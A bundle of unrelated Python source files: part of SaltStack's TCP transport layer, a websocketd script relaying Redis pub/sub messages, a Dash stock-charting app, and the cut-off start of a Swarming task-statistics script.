def __del__(self):
self.close()
# pylint: enable=W1701
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def pre_fork(self, process_manager):
"""
Pre-fork we need to create the zmq router device
"""
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
if USE_LOAD_BALANCER:
self.socket_queue = multiprocessing.Queue()
process_manager.add_process(
LoadBalancerServer, args=(self.opts, self.socket_queue)
)
elif not salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind((self.opts["interface"], int(self.opts["ret_port"])))
def post_fork(self, payload_handler, io_loop):
"""
After forking we need to create all of the local sockets to listen to the
router
payload_handler: function to call with your payloads
"""
if self.opts["pub_server_niceness"] and not salt.utils.platform.is_windows():
log.info(
"setting Publish daemon niceness to %i",
self.opts["pub_server_niceness"],
)
os.nice(self.opts["pub_server_niceness"])
self.payload_handler = payload_handler
self.io_loop = io_loop
self.serial = salt.payload.Serial(self.opts)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
if USE_LOAD_BALANCER:
self.req_server = LoadBalancerWorker(
self.socket_queue,
self.handle_message,
ssl_options=self.opts.get("ssl"),
)
else:
if salt.utils.platform.is_windows():
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(0)
self._socket.bind(
(self.opts["interface"], int(self.opts["ret_port"]))
)
self.req_server = SaltMessageServer(
self.handle_message,
ssl_options=self.opts.get("ssl"),
io_loop=self.io_loop,
)
self.req_server.add_socket(self._socket)
self._socket.listen(self.backlog)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(
self, payload_handler, io_loop
)
@salt.ext.tornado.gen.coroutine
def handle_message(self, stream, header, payload):
"""
Handle incoming messages from underlying tcp streams
"""
try:
try:
payload = self._decode_payload(payload)
except Exception: # pylint: disable=broad-except
stream.write(salt.transport.frame.frame_msg("bad load", header=header))
raise salt.ext.tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(
payload.get("load"), dict
):
yield stream.write(
salt.transport.frame.frame_msg(
"payload and load must be a dict", header=header
)
)
raise salt.ext.tornado.gen.Return()
try:
id_ = payload["load"].get("id", "")
if "\0" in id_:
log.error("Payload contains an id with a null byte: %s", payload)
stream.send(self.serial.dumps("bad load: id contains a null byte"))
raise salt.ext.tornado.gen.Return()
except TypeError:
log.error("Payload contains non-string id: %s", payload)
stream.send(
self.serial.dumps("bad load: id {} is not a string".format(id_))
)
raise salt.ext.tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if (
payload["enc"] == "clear"
and payload.get("load", {}).get("cmd") == "_auth"
):
yield stream.write(
salt.transport.frame.frame_msg(
self._auth(payload["load"]), header=header
)
)
raise salt.ext.tornado.gen.Return()
# TODO: test
try:
ret, req_opts = yield self.payload_handler(payload)
except Exception as e: # pylint: disable=broad-except
# always attempt to return an error to the minion
stream.write("Some exception handling minion payload")
log.error(
"Some exception handling a payload from minion", exc_info=True
)
stream.close()
raise salt.ext.tornado.gen.Return()
req_fun = req_opts.get("fun", "send")
if req_fun == "send_clear":
stream.write(salt.transport.frame.frame_msg(ret, header=header))
elif req_fun == "send":
stream.write(
salt.transport.frame.frame_msg(
self.crypticle.dumps(ret), header=header
)
)
elif req_fun == "send_private":
stream.write(
salt.transport.frame.frame_msg(
self._encrypt_private(ret, req_opts["key"], req_opts["tgt"],),
header=header,
)
)
else:
log.error("Unknown req_fun %s", req_fun)
# always attempt to return an error to the minion
stream.write("Server-side exception handling payload")
stream.close()
except salt.ext.tornado.gen.Return:
raise
except salt.ext.tornado.iostream.StreamClosedError:
# Stream was closed. This could happen if the remote side
# closed the connection on its end (eg in a timeout or shutdown
# situation).
log.error("Connection was unexpectedly closed", exc_info=True)
except Exception as exc: # pylint: disable=broad-except
# Absorb any other exceptions
log.error("Unexpected exception occurred: %s", exc, exc_info=True)
raise salt.ext.tornado.gen.Return()
class SaltMessageServer(salt.ext.tornado.tcpserver.TCPServer):
"""
Raw TCP server which will receive all of the TCP streams and re-assemble
messages that are sent through to us
"""
def __init__(self, message_handler, *args, **kwargs):
io_loop = (
kwargs.pop("io_loop", None) or salt.ext.tornado.ioloop.IOLoop.current()
)
self._closing = False
super().__init__(*args, **kwargs)
self.io_loop = io_loop
self.clients = []
self.message_handler = message_handler
@salt.ext.tornado.gen.coroutine
def handle_stream(self, stream, address):
"""
Handle incoming streams and add messages to the incoming queue
"""
log.trace("Req client %s connected", address)
self.clients.append((stream, address))
unpacker = salt.utils.msgpack.Unpacker()
try:
while True:
wire_bytes = yield stream.read_bytes(4096, partial=True)
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
header = framed_msg["head"]
self.io_loop.spawn_callback(
self.message_handler, stream, header, framed_msg["body"]
)
except salt.ext.tornado.iostream.StreamClosedError:
log.trace("req client disconnected %s", address)
self.remove_client((stream, address))
except Exception as e: # pylint: disable=broad-except
log.trace("other master-side exception: %s", e)
self.remove_client((stream, address))
stream.close()
def remove_client(self, client):
try:
self.clients.remove(client)
except ValueError:
log.trace("Message server client was not in list to remove")
def shutdown(self):
"""
Shutdown the whole server
"""
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.shutdown() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
"""
Close the server
"""
if self._closing:
return
self._closing = True
for item in self.clients:
client, address = item
client.close()
self.remove_client(item)
try:
self.stop()
except OSError as exc:
if exc.errno != 9:
raise
if USE_LOAD_BALANCER:
class LoadBalancerWorker(SaltMessageServer):
"""
This will receive TCP connections from 'LoadBalancerServer' via
a multiprocessing queue.
Since the queue is shared amongst workers, only one worker will handle
a given connection.
"""
def __init__(self, socket_queue, message_handler, *args, **kwargs):
super().__init__(message_handler, *args, **kwargs)
self.socket_queue = socket_queue
self._stop = threading.Event()
self.thread = threading.Thread(target=self.socket_queue_thread)
self.thread.start()
def stop(self):
salt.utils.versions.warn_until(
"Phosphorus",
"Please stop calling {0}.{1}.stop() and instead call {0}.{1}.close()".format(
__name__, self.__class__.__name__
),
)
self.close()
def close(self):
self._stop.set()
self.thread.join()
super().close()
def socket_queue_thread(self):
try:
while True:
try:
client_socket, address = self.socket_queue.get(True, 1)
except queue.Empty:
if self._stop.is_set():
break
continue
# 'self.io_loop' initialized in super class
# 'salt.ext.tornado.tcpserver.TCPServer'.
# 'self._handle_connection' defined in same super class.
self.io_loop.spawn_callback(
self._handle_connection, client_socket, address
)
except (KeyboardInterrupt, SystemExit):
pass
class TCPClientKeepAlive(salt.ext.tornado.tcpclient.TCPClient):
"""
Override _create_stream() in TCPClient to enable keep alive support.
"""
def __init__(self, opts, resolver=None):
self.opts = opts
super().__init__(resolver=resolver)
def _create_stream(
self, max_buffer_size, af, addr, **kwargs
): # pylint: disable=unused-argument,arguments-differ
"""
Override _create_stream() in TCPClient.
Tornado 4.5 added the kwargs 'source_ip' and 'source_port'.
Due to this, use **kwargs to swallow these and any future
kwargs to maintain compatibility.
"""
# Always connect in plaintext; we'll convert to ssl if necessary
# after one connection has completed.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
_set_tcp_keepalive(sock, self.opts)
stream = salt.ext.tornado.iostream.IOStream(
sock, max_buffer_size=max_buffer_size
)
if salt.ext.tornado.version_info < (5,):
return stream.connect(addr)
return stream, stream.connect(addr)
class SaltMessageClientPool(salt.transport.MessageClientPool):
"""
Wrapper class of SaltMessageClient to avoid blocking waiting while writing data to socket.
"""
def __init__(self, opts, args=None, kwargs=None):
super().__init__(SaltMessageClient, opts, args=args, kwargs=kwargs)
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def close(self):
for message_client in self.message_clients:
message_client.close()
self.message_clients = []
@salt.ext.tornado.gen.coroutine
def connect(self):
futures = []
for message_client in self.message_clients:
futures.append(message_client.connect())
yield futures
raise salt.ext.tornado.gen.Return(None)
def on_recv(self, *args, **kwargs):
for message_client in self.message_clients:
message_client.on_recv(*args, **kwargs)
def send(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0].send(*args, **kwargs)
def write_to_stream(self, *args, **kwargs):
message_clients = sorted(self.message_clients, key=lambda x: len(x.send_queue))
return message_clients[0]._stream.write(*args, **kwargs)
# TODO consolidate with IPCClient
# TODO: limit in-flight messages.
# TODO: singleton? Something to not re-create the tcp connection so much
class SaltMessageClient:
"""
Low-level message sending client
"""
def __init__(
self,
opts,
host,
port,
io_loop=None,
resolver=None,
connect_callback=None,
disconnect_callback=None,
source_ip=None,
source_port=None,
):
self.opts = opts
self.host = host
self.port = port
self.source_ip = source_ip
self.source_port = source_port
self.connect_callback = connect_callback
self.disconnect_callback = disconnect_callback
self.io_loop = io_loop or salt.ext.tornado.ioloop.IOLoop.current()
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._tcp_client = TCPClientKeepAlive(opts, resolver=resolver)
self._mid = 1
self._max_messages = int((1 << 31) - 2) # number of IDs before we wrap
# TODO: max queue size
self.send_queue = [] # queue of messages to be sent
self.send_future_map = {} # mapping of request_id -> Future
self.send_timeout_map = {} # request_id -> timeout_callback
self._read_until_future = None
self._on_recv = None
self._closing = False
self._connecting_future = self.connect()
self._stream_return_future = salt.ext.tornado.concurrent.Future()
self.io_loop.spawn_callback(self._stream_return)
def _stop_io_loop(self):
if self.io_loop is not None:
self.io_loop.stop()
# TODO: timeout inflight sessions
def close(self):
if self._closing:
return
self._closing = True
if hasattr(self, "_stream") and not self._stream.closed():
# If _stream_return() hasn't completed, it means the IO
# Loop is stopped (such as when using
# 'salt.utils.asynchronous.SyncWrapper'). Ensure that
# _stream_return() completes by restarting the IO Loop.
# This will prevent potential errors on shutdown.
try:
orig_loop = salt.ext.tornado.ioloop.IOLoop.current()
self.io_loop.make_current()
self._stream.close()
if self._read_until_future is not None:
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
if self._read_until_future.done():
self._read_until_future.exception()
if (
self.io_loop
!= salt.ext.tornado.ioloop.IOLoop.current(instance=False)
or not self._stream_return_future.done()
):
self.io_loop.add_future(
self._stream_return_future,
lambda future: self._stop_io_loop(),
)
self.io_loop.start()
except Exception as e: # pylint: disable=broad-except
log.info("Exception caught in SaltMessageClient.close: %s", str(e))
finally:
orig_loop.make_current()
self._tcp_client.close()
self.io_loop = None
self._read_until_future = None
# Clear callback references to allow the object that they belong to
# to be deleted.
self.connect_callback = None
self.disconnect_callback = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def connect(self):
"""
Ask for this client to reconnect to the origin
"""
if hasattr(self, "_connecting_future") and not self._connecting_future.done():
future = self._connecting_future
else:
future = salt.ext.tornado.concurrent.Future()
self._connecting_future = future
self.io_loop.add_callback(self._connect)
# Add the callback only when a new future is created
if self.connect_callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(self.connect_callback, response)
future.add_done_callback(handle_future)
return future
# TODO: tcp backoff opts
@salt.ext.tornado.gen.coroutine
def _connect(self):
"""
Try to connect for the rest of time!
"""
while True:
if self._closing:
break
try:
kwargs = {}
if self.source_ip or self.source_port:
if salt.ext.tornado.version_info >= (4, 5):
### source_ip and source_port are supported only in Tornado >= 4.5
# See http://www.tornadoweb.org/en/stable/releases/v4.5.0.html
# Otherwise will just ignore these args
kwargs = {
"source_ip": self.source_ip,
"source_port": self.source_port,
}
else:
log.warning(
"If you need a certain source IP/port, consider upgrading Tornado >= 4.5"
)
with salt.utils.asynchronous.current_ioloop(self.io_loop):
self._stream = yield self._tcp_client.connect(
self.host, self.port, ssl_options=self.opts.get("ssl"), **kwargs
)
self._connecting_future.set_result(True)
break
except Exception as exc: # pylint: disable=broad-except
log.warning(
"TCP Message Client encountered an exception while connecting to %s:%s: %r",
self.host,
self.port,
exc,
)
yield salt.ext.tornado.gen.sleep(1) # TODO: backoff
# self._connecting_future.set_exception(exc)
@salt.ext.tornado.gen.coroutine
def _stream_return(self):
try:
while not self._closing and (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
self._read_until_future = self._stream.read_bytes(
4096, partial=True
)
wire_bytes = yield self._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(
framed_msg
)
header = framed_msg["head"]
body = framed_msg["body"]
message_id = header.get("mid")
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_result(body)
self.remove_message_timeout(message_id)
else:
if self._on_recv is not None:
self.io_loop.spawn_callback(self._on_recv, header, body)
else:
log.error(
"Got response for message_id %s that we are not tracking",
message_id,
)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug(
"tcp stream to %s:%s closed, unable to recv",
self.host,
self.port,
)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
except TypeError:
# This is an invalid transport
if "detect_mode" in self.opts:
log.info(
"There was an error trying to use TCP transport; "
"attempting to fallback to another transport"
)
else:
raise SaltClientError
except Exception as e: # pylint: disable=broad-except
log.error("Exception parsing response", exc_info=True)
for future in self.send_future_map.values():
future.set_exception(e)
self.send_future_map = {}
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
finally:
self._stream_return_future.set_result(True)
@salt.ext.tornado.gen.coroutine
def _stream_send(self):
while (
not self._connecting_future.done()
or self._connecting_future.result() is not True
):
yield self._connecting_future
while len(self.send_queue) > 0:
message_id, item = self.send_queue[0]
try:
yield self._stream.write(item)
del self.send_queue[0]
# if the connection is dead, lets fail this send, and make sure we
# attempt to reconnect
except salt.ext.tornado.iostream.StreamClosedError as e:
if message_id in self.send_future_map:
self.send_future_map.pop(message_id).set_exception(e)
self.remove_message_timeout(message_id)
del self.send_queue[0]
if self._closing:
return
if self.disconnect_callback:
self.disconnect_callback()
# if the last connect finished, then we need to make a new one
if self._connecting_future.done():
self._connecting_future = self.connect()
yield self._connecting_future
def _message_id(self):
wrap = False
while self._mid in self.send_future_map:
if self._mid >= self._max_messages:
if wrap:
# this shouldn't ever happen, but just in case
raise Exception("Unable to find available messageid")
self._mid = 1
wrap = True
else:
self._mid += 1
return self._mid
# TODO: return a message object which takes care of multiplexing?
def on_recv(self, callback):
"""
Register a callback for received messages (that we didn't initiate)
"""
if callback is None:
self._on_recv = callback
else:
def wrap_recv(header, body):
callback(body)
self._on_recv = wrap_recv
def remove_message_timeout(self, message_id):
if message_id not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message_id)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message_id, msg):
if message_id in self.send_timeout_map:
del self.send_timeout_map[message_id]
if message_id in self.send_future_map:
future = self.send_future_map.pop(message_id)
# In a race condition the message might have been sent by the time
# we're timing it out. Make sure the future is not None
if future is not None:
if future.attempts < future.tries:
future.attempts += 1
log.debug(
"SaltReqTimeoutError, retrying. (%s/%s)",
future.attempts,
future.tries,
)
self.send(
msg, timeout=future.timeout, tries=future.tries, future=future,
)
else:
future.set_exception(SaltReqTimeoutError("Message timed out"))
def send(self, msg, timeout=None, callback=None, raw=False, future=None, tries=3):
"""
Send given message, and return a future
"""
message_id = self._message_id()
header = {"mid": message_id}
if future is None:
future = salt.ext.tornado.concurrent.Future()
future.tries = tries
future.attempts = 0
future.timeout = timeout
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message_id] = future
if self.opts.get("detect_mode") is True:
timeout = 1
if timeout is not None:
send_timeout = self.io_loop.call_later(
timeout, self.timeout_message, message_id, msg
)
self.send_timeout_map[message_id] = send_timeout
# if we don't have a send queue, we need to spawn the callback to do the sending
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._stream_send)
self.send_queue.append(
(message_id, salt.transport.frame.frame_msg(msg, header=header))
)
return future
class Subscriber:
"""
Client object for use with the TCP publisher server
"""
def __init__(self, stream, address):
self.stream = stream
self.address = address
self._closing = False
self._read_until_future = None
self.id_ = None
def close(self):
if self._closing:
return
self._closing = True
if not self.stream.closed():
self.stream.close()
if self._read_until_future is not None and self._read_until_future.done():
# This will prevent this message from showing up:
# '[ERROR ] Future exception was never retrieved:
# StreamClosedError'
# This happens because the logic is always waiting to read
# the next message and the associated read future is marked
# 'StreamClosedError' when the stream is closed.
self._read_until_future.exception()
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
class PubServer(salt.ext.tornado.tcpserver.TCPServer):
"""
TCP publisher
"""
def __init__(self, opts, io_loop=None):
super().__init__(ssl_options=opts.get("ssl"))
self.io_loop = io_loop
self.opts = opts
self._closing = False
self.clients = set()
self.aes_funcs = salt.master.AESFuncs(self.opts)
self.present = {}
self.event = None
self.presence_events = False
if self.opts.get("presence_events", False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != "tcp":
tcp_only = False
if tcp_only:
# Only when the transport is TCP only, the presence events will
# be handled here. Otherwise, it will be handled in the
# 'Maintenance' process.
self.presence_events = True
if self.presence_events:
self.event = salt.utils.event.get_event(
"master", opts=self.opts, listen=False
)
else:
self.event = None
def close(self):
if self._closing:
return
self._closing = True
if self.event is not None:
self.event.destroy()
self.event = None
if self.aes_funcs is not None:
self.aes_funcs.destroy()
self.aes_funcs = None
# pylint: disable=W1701
def __del__(self):
self.close()
# pylint: enable=W1701
def _add_client_present(self, client):
id_ = client.id_
if id_ in self.present:
clients = self.present[id_]
clients.add(client)
else:
self.present[id_] = {client}
if self.presence_events:
data = {"new": [id_], "lost": []}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
def _remove_client_present(self, client):
id_ = client.id_
if id_ is None or id_ not in self.present:
# This is possible if _remove_client_present() is invoked
# before the minion's id is validated.
return
clients = self.present[id_]
if client not in clients:
# Since _remove_client_present() is potentially called from
# _stream_read() and/or publish_payload(), it is possible for
# it to be called twice, in which case we will get here.
# This is not an abnormal case, so no logging is required.
return
clients.remove(client)
if len(clients) == 0:
del self.present[id_]
if self.presence_events:
data = {"new": [], "lost": [id_]}
self.event.fire_event(
data, salt.utils.event.tagify("change", "presence")
)
data = {"present": list(self.present.keys())}
self.event.fire_event(
data, salt.utils.event.tagify("present", "presence")
)
@salt.ext.tornado.gen.coroutine
def _stream_read(self, client):
unpacker = salt.utils.msgpack.Unpacker()
while not self._closing:
try:
client._read_until_future = client.stream.read_bytes(4096, partial=True)
wire_bytes = yield client._read_until_future
unpacker.feed(wire_bytes)
for framed_msg in unpacker:
framed_msg = salt.transport.frame.decode_embedded_strs(framed_msg)
body = framed_msg["body"]
if body["enc"] != "aes":
# We only accept 'aes' encoded messages for 'id'
continue
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
load = crypticle.loads(body["load"])
load = salt.transport.frame.decode_embedded_strs(load)
if not self.aes_funcs.verify_minion(load["id"], load["tok"]):
continue
client.id_ = load["id"]
self._add_client_present(client)
except salt.ext.tornado.iostream.StreamClosedError as e:
log.debug("tcp stream to %s closed, unable to recv", client.address)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
break
except Exception as e: # pylint: disable=broad-except
log.error(
"Exception parsing response from %s", client.address, exc_info=True
)
continue
def handle_stream(self, stream, address):
log.trace("Subscriber at %s connected", address)
client = Subscriber(stream, address)
self.clients.add(client)
self.io_loop.spawn_callback(self._stream_read, client)
# TODO: ACK the publish through IPC
@salt.ext.tornado.gen.coroutine
def publish_payload(self, package, _):
log.debug("TCP PubServer sending payload: %s", package)
payload = salt.transport.frame.frame_msg(package["payload"])
to_remove = []
if "topic_lst" in package:
topic_lst = package["topic_lst"]
for topic in topic_lst:
if topic in self.present:
# This will rarely be a list of more than 1 item. It will
# be more than 1 item if the minion disconnects from the
# master in an unclean manner (eg cable yank), then
# restarts and the master is yet to detect the disconnect
# via TCP keep-alive.
for client in self.present[topic]:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
else:
log.debug("Publish target %s not connected", topic)
else:
for client in self.clients:
try:
# Write the packed str
f = client.stream.write(payload)
self.io_loop.add_future(f, lambda f: True)
except salt.ext.tornado.iostream.StreamClosedError:
to_remove.append(client)
for client in to_remove:
log.debug(
"Subscriber at %s has disconnected from publisher", client.address
)
client.close()
self._remove_client_present(client)
self.clients.discard(client)
log.trace("TCP PubServer finished publishing payload")
class TCPPubServerChannel(salt.transport.server.PubServerChannel):
# TODO: opts!
# Based on default used in salt.ext.tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
self.ckminions = salt.utils.minions.CkMinions(opts)
self.io_loop = None
def __setstate__(self, state):
salt.master.SMaster.secrets = state["secrets"]
self.__init__(state["opts"])
def __getstate__(self):
return {"opts": self.opts, "secrets": salt.master.SMaster.secrets}
def _publish_daemon(self, **kwargs):
"""
Bind to the interface specified in the configuration file
"""
salt.utils.process.appendproctitle(self.__class__.__name__)
log_queue = kwargs.get("log_queue")
if log_queue is not None:
salt.log.setup.set_multiprocessing_logging_queue(log_queue)
log_queue_level = kwargs.get("log_queue_level")
if log_queue_level is not None:
salt.log.setup.set_multiprocessing_logging_level(log_queue_level)
salt.log.setup.setup_multiprocessing_logging(log_queue)
# Check if io_loop was set outside
if self.io_loop is None:
self.io_loop = salt.ext.tornado.ioloop.IOLoop.current()
# Spin up the publisher
pub_server = PubServer(self.opts, io_loop=self.io_loop)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(sock, self.opts)
sock.setblocking(0)
sock.bind((self.opts["interface"], int(self.opts["publish_port"])))
sock.listen(self.backlog)
# pub_server will take ownership of the socket
pub_server.add_socket(sock)
# Set up Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
pull_sock = salt.transport.ipc.IPCMessageServer(
pull_uri, io_loop=self.io_loop, payload_handler=pub_server.publish_payload,
)
# Securely create socket
log.info("Starting the Salt Puller on %s", pull_uri)
with salt.utils.files.set_umask(0o177):
pull_sock.start()
# run forever
try:
self.io_loop.start()
except (KeyboardInterrupt, SystemExit):
salt.log.setup.shutdown_multiprocessing_logging()
finally:
pull_sock.close()
def pre_fork(self, process_manager, kwargs=None):
"""
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
"""
process_manager.add_process(self._publish_daemon, kwargs=kwargs)
def publish(self, load):
"""
Publish "load" to minions
"""
payload = {"enc": "aes"}
crypticle = salt.crypt.Crypticle(
self.opts, salt.master.SMaster.secrets["aes"]["secret"].value
)
payload["load"] = crypticle.dumps(load)
if self.opts["sign_pub_messages"]:
master_pem_path = os.path.join(self.opts["pki_dir"], "master.pem")
log.debug("Signing data packet")
payload["sig"] = salt.crypt.sign_message(master_pem_path, payload["load"])
# Use the Salt IPC server
if self.opts.get("ipc_mode", "") == "tcp":
pull_uri = int(self.opts.get("tcp_master_publish_pull", 4514))
else:
pull_uri = os.path.join(self.opts["sock_dir"], "publish_pull.ipc")
# TODO: switch to the actual asynchronous interface
# pub_sock = salt.transport.ipc.IPCMessageClient(self.opts, io_loop=self.io_loop)
pub_sock = salt.utils.asynchronous.SyncWrapper(
salt.transport.ipc.IPCMessageClient, (pull_uri,), loop_kwarg="io_loop",
)
pub_sock.connect()
int_payload = {"payload": self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load["tgt_type"] == "list" and not self.opts.get("order_masters", False):
if isinstance(load["tgt"], str):
# Fetch a list of minions that match
_res = self.ckminions.check_minions(
load["tgt"], tgt_type=load["tgt_type"]
)
match_ids = _res["minions"]
log.debug("Publish Side Match: %s", match_ids)
# Send list of miions thru so zmq can target them
int_payload["topic_lst"] = match_ids
else:
int_payload["topic_lst"] = load["tgt"]
# Send it over IPC!
pub_sock.send(int_payload)
|
subscriber.py
|
#!/usr/bin/python3
# cf. https://github.com/joewalnes/websocketd/wiki/Simple-Python-Duplex-Example
#
# example usage:
# websocketd --port=4430 --ssl --sslcert /ssl/fullchain.pem --sslkey /ssl/privkey.pem subscriber.py --devconsole
#
from sys import stdout, stdin
import sys
import threading
import redis
import json
import os
mThreads=[]
r=None
if "ZOO_REDIS_HOST" in os.environ:
r = redis.Redis(host=os.environ["ZOO_REDIS_HOST"], port=6379, db=0)
else:
r = redis.Redis(host='redis', port=6379, db=0)
def send(t):
# send string to web page
stdout.write(t+'\n')
stdout.flush()
def listenMessages(jobID=None):
global r
p = r.pubsub()
p.subscribe(jobID)
hasSend=False
for raw_message in p.listen():
try:
send(str(raw_message["data"],'utf-8'))
hasSend=True
try:
tmp=json.loads(str(raw_message["data"],'utf-8'))
if tmp is not None and "outputs" in tmp:
sys.exit()
except Exception as e:
print(str(e))
return
except:
if not(hasSend):
send(str(raw_message["data"]))
def receive():
global n
global mThreads
while True:
t = stdin.readline().strip()
if not t:
break
t1 = t.split(" ")
if t1[0]=="SUB":
mThreads += [threading.Thread(target=listenMessages,kwargs={"jobID":t1[1]})]
mThreads[len(mThreads)-1].start()
else:
send(t)
t0 = threading.Thread(target=receive)
t0.start()
t0.join()
#for i in range(len(mThreads)):
# mThreads[i].join()
|
appsStock.py
|
# -*- coding: utf-8 -*-
import pandas_datareader.data as web
import datetime
import dash
import dash_core_components as dcc
import dash_html_components as html
import plotly.graph_objs as go
from dash.dependencies import Input, Output
# time handel
import multiprocessing
def find_stock(name):
web.DataReader(name, 'morningstar', datetime.datetime(2015,1,1), datetime.datetime(2015,1,3))
return
# default stock
defaultStock = 'GOOGL'
start = datetime.datetime(2015,1,1)
end = datetime.datetime.now()
defaultdf = web.DataReader(defaultStock, 'morningstar', start, end)
app = dash.Dash()
app.layout = html.Div(children=[
html.H1(children='Morningstar Stocks'),
html.Div(children='''
Please Input Company's Name
'''),
dcc.Input(id = 'input', value = 'a', type = 'text'),
html.Div( id = 'error-message', children = ''),
dcc.Graph(
id='example-graph',
)
])
@app.callback(
Output(component_id = 'error-message', component_property = 'children'),
[Input(component_id = 'input', component_property = 'value')]
)
def error_raise(input_val):
if len(input_val) == 0:
return 'Please Enter Stock\'s name'
stock = str(input_val)
p = multiprocessing.Process(target=find_stock, args=(stock,))
p.start()
# wait the request for 1 seconds
p.join(1)
if p.is_alive():
print "request has been running for 1 seconds... let's kill it..."
# Terminate
p.terminate()
p.join()
return '{} Request Failed: Please try other names'.format(stock)
print "Request Success"
return ''
@app.callback(
Output(component_id = 'example-graph', component_property = 'figure'),
[Input(component_id = 'input', component_property = 'value'),
Input(component_id = 'error-message', component_property = 'children')]
)
def update_graph(input_val,error_mes):
error_mes = str(error_mes)
print "hihere", len(error_mes)
if len(input_val) != 0 and len(error_mes) == 0 :
print "call", input_val
stock = str(input_val)
start = datetime.datetime(2015, 1, 1)
end = datetime.datetime.now()
df = web.DataReader(stock, 'morningstar' , start, end)
return {
'data': [go.Scatter( x=df.index.get_level_values('Date') , y=df.Close )] ,
'layout': {
'title': input_val
}
}
return {
'data': [go.Scatter( x=defaultdf.index.get_level_values('Date') ,
y=defaultdf.Close )] ,
'layout': {
'title': defaultStock
}
}
if __name__ == '__main__':
app.run_server(debug=True)
|
count.py
|
#!/usr/bin/env python
# Copyright 2015 The Swarming Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0 that
# can be found in the LICENSE file.
"""Calculate statistics about tasks.
Saves the data fetched from the server into a json file to enable reprocessing
the data without having to always fetch from the server.
"""
import datetime
import json
import logging
import optparse
import os
import subprocess
import Queue
import threading
import sys
import urllib
CLIENT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
sys.path.insert(0, CLIENT_DIR)
from utils import graph
_EPOCH = datetime.datetime.utcfromtimestamp(0)
def parse_time_option(value):
"""Converts time as an option into a datetime.datetime.
Returns None if not specified.
"""
if not value:
return None
try:
return _EPOCH + datetime.timedelta(seconds=int(value))
except ValueError:
pass
for fmt in ('%Y-%m-%d',):
try:
return datetime.datetime.strptime(value, fmt)
except ValueError:
pass
raise ValueError('Failed to parse %s' % value)
def fetch_data(swarming, start, end, state, tags):
"""Fetches data from swarming and returns it."""
# Split the work in days. That's a lot of requests to do.
queue = Queue.Queue()
threads = []
def run(start, cmd):
data = json.loads(subprocess.check_output(cmd))
queue.put((start, int(data['count'])))
day = start
while day != end:
data = [
('start', int((day - _EPOCH).total_seconds())),
('end', int((day + datetime.timedelta(days=1)-_EPOCH).total_seconds())),
('state', state),
]
for tag in tags:
